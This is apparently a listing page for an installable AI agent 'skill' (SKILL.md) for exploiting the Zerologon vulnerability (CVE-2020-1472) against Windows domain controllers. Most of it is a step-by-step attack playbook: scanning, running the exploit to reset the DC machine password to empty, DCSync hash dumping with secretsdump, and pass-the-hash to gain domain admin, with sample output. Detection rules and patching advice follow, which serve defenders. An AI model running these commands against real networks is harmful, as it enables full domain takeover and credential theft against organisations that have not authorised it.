Agent skill

exploiting-zerologon-vulnerability-cve-2020-1472

Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty.

View SKILL.md on GitHub Repository
Stars 0
Forks 0

Install this agent skill to your Project

npx add-skill https://github.com/autohandai/community-skills/tree/main/exploiting-zerologon-vulnerability-cve-2020-1472

SKILL.md

Exploiting Zerologon Vulnerability (CVE-2020-1472)

Overview

Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw exists in the cryptographic implementation of AES-CFB8 mode, where the initialization vector (IV) is incorrectly set to all zeros. This allows an unauthenticated attacker with network access to a domain controller to establish a Netlogon session and reset the DC machine account password to empty, achieving full domain compromise. Microsoft patched this vulnerability in August 2020 (KB4571694).

Prerequisites

  • Network access to a Domain Controller (TCP port 135 and dynamic RPC ports)
  • No authentication required (unauthenticated exploit)
  • Target DC must not have the February 2021 enforcement mode enabled
  • Impacket toolkit installed
  • Written authorization for red team engagement

MITRE ATT&CK Mapping

Technique ID Name Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation
T1210 Exploitation of Remote Services Lateral Movement
T1003.006 OS Credential Dumping: DCSync Credential Access
T1078.002 Valid Accounts: Domain Accounts Persistence

Vulnerability Technical Details

Root Cause

The Netlogon authentication protocol uses AES-CFB8 encryption with a client challenge and server challenge. The vulnerability exists because:

  1. The IV is hardcoded to 16 bytes of zeros
  2. When the plaintext is 8 bytes of zeros, AES-CFB8 produces a ciphertext of all zeros with probability 1 in 256
  3. An attacker can send approximately 256 authentication attempts (takes ~3 seconds) to succeed

Affected Systems

  • Windows Server 2008 R2 through Windows Server 2019
  • All domain controllers running unpatched Netlogon service
  • Samba versions < 4.8 (if running as AD DC)

Step 1: Identify Vulnerable Domain Controllers

bash
# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24

# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1

# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologon

Step 2: Exploit Zerologon

bash
# Using Impacket's CVE-2020-1472 exploit
# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1

# Expected output:
# Performing authentication attempts...
# =========================================
# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)
# NetrServerPasswordSet2 call was successful
# DC01$ machine account password set to empty string

Step 3: DCSync with Empty Password

bash
# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\$@10.10.10.1

# Output includes all domain hashes:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::
# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::

# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\$@10.10.10.1 \
  -just-dc-user Administrator

Step 4: Obtain Domain Admin Access

bash
# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
  corp.local/Administrator@10.10.10.1

# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
  corp.local/Administrator@10.10.10.1

Step 5: Restore Machine Account Password (CRITICAL)

WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.

bash
# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
  -hexpass <original_hex_password>

# Method 2: Force machine account password change from DC
# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*

# Method 3: Restart the DC (it will auto-regenerate machine password)
# This is the safest method but causes downtime

Detection

Windows Event Logs

Event ID 4742: A computer account was changed
- Look for: DC$ account with password change
- Anomaly: Multiple 4742 events for DC$ in short period

Event ID 5805: Netlogon authentication failure
- Multiple failures followed by success = Zerologon attempt

Event ID 4624 (Type 3): Network logon
- DC$ account logging in from unexpected IP

Network Detection

yaml
# Suricata rule for Zerologon
alert dcerpc any any -> any any (
  msg:"ET EXPLOIT Possible Zerologon NetrServerReqChallenge";
  flow:established,to_server;
  dce_opnum:4;
  content:"|00 00 00 00 00 00 00 00|";
  sid:2030870;
  rev:1;
)

Sigma Rule

yaml
title: Zerologon Exploitation Attempt
status: stable
logsource:
    product: windows
    service: system
detection:
    selection:
        EventID: 5805
        LogonType: 3
    timeframe: 5m
    condition: selection | count(EventID) > 100
level: critical
tags:
    - attack.privilege_escalation
    - attack.t1068
    - cve.2020.1472

Defensive Recommendations

  1. Apply patches immediately - KB4571694 (August 2020) and enforce February 2021 mode
  2. Enable enforcement mode via registry: FullSecureChannelProtection = 1
  3. Monitor Event ID 5805 for repeated Netlogon failures
  4. Deploy Microsoft Defender for Identity (detects Zerologon automatically)
  5. Network segmentation - Restrict direct access to DCs from user networks
  6. Block Netlogon RPC from non-DC systems where possible

References

Recommended Agent Skills

Expand your agent's capabilities with these related and highly-rated skills.

autohandai/community-skills

mapping-mitre-attack-techniques

Maps observed adversary behaviors, security alerts, and detection rules to MITRE ATT&CK techniques and sub-techniques to quantify detection coverage and guide control prioritization. Use when building an ATT&CK-based coverage heatmap, tagging SIEM alerts with technique IDs, aligning security controls to adversary playbooks, or reporting threat exposure to executives. Activates for requests involving ATT&CK Navigator, Sigma rules, MITRE D3FEND, or coverage gap analysis.

0 0
Explore
autohandai/community-skills

hunting-for-spearphishing-indicators

Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.

0 0
Explore
autohandai/community-skills

analyzing-malicious-url-with-urlscan

URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat

0 0
Explore
autohandai/community-skills

implementing-zero-standing-privilege-with-cyberark

Deploy CyberArk Secure Cloud Access to eliminate standing privileges in hybrid and multi-cloud environments using just-in-time access with time, entitlement, and approval controls.

0 0
Explore
autohandai/community-skills

implementing-pam-for-database-access

Deploy privileged access management for database systems including Oracle, SQL Server, PostgreSQL, and MySQL. Covers session proxy configuration, credential vaulting, query auditing, dynamic credentia

0 0
Explore
autohandai/community-skills

detecting-t1003-credential-dumping-with-edr

Detect OS credential dumping techniques targeting LSASS memory, SAM database, NTDS.dit, and cached credentials using EDR telemetry, Sysmon process access monitoring, and Windows security event correlation.

0 0
Explore

Didn't find tool you were looking for?

Be as detailed as possible for better results